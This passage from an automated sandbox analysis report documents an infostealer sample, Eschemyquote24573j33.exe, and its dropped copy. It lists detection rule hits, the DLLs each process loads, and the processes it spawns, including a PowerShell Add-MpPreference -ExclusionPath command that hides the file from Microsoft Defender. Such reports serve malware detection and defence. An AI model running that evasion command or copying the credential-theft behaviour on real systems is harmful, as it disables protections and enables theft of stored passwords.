                    Source: 10.2.ctsdvwT.exe.4071760.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Eschemyquote24573j33.exe.39cb710.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.ctsdvwT.exe.3f0d1a8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Eschemyquote24573j33.exe.39cb710.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: Eschemyquote24573j33.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, ZTFEpdjP8zw.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, WnRNxU.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, 2njIk.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, I5ElxL.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, QQSiOsa4hPS.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, FdHU4eb83Z7.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, 3VzYbXLJt4.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, 3VzYbXLJt4.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, 3VzYbXLJt4.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, 3VzYbXLJt4.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, PrUsrswPYsf1O0VuSQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, gCdcqLt9S80SxXohl8.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, gCdcqLt9S80SxXohl8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, gCdcqLt9S80SxXohl8.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, PrUsrswPYsf1O0VuSQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, gCdcqLt9S80SxXohl8.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, gCdcqLt9S80SxXohl8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, gCdcqLt9S80SxXohl8.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@13/9@1/1
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Eschemyquote24573j33.exe.logJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6388:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMutant created: \Sessions\1\BaseNamedObjects\PIcecqLkKY
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2cycmogx.s02.ps1Jump to behavior
                    Source: Eschemyquote24573j33.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Eschemyquote24573j33.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.00000000033E6000.00000004.00000800.00020000.00000000.sdmp, Eschemyquote24573j33.exe, 00000004.00000002.4509927352.00000000033F9000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000008.00000002.2259031078.0000000003478000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000008.00000002.2259031078.0000000003465000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000B.00000002.4509557072.0000000003265000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000B.00000002.4509557072.0000000003278000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: Eschemyquote24573j33.exeReversingLabs: Detection: 57%
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeFile read: C:\Users\user\Desktop\Eschemyquote24573j33.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Eschemyquote24573j33.exe "C:\Users\user\Desktop\Eschemyquote24573j33.exe"
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe"
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeProcess created: C:\Users\user\Desktop\Eschemyquote24573j33.exe "C:\Users\user\Desktop\Eschemyquote24573j33.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeProcess created: C:\Users\user\Desktop\Eschemyquote24573j33.exe "C:\Users\user\Desktop\Eschemyquote24573j33.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dllJump to behavior
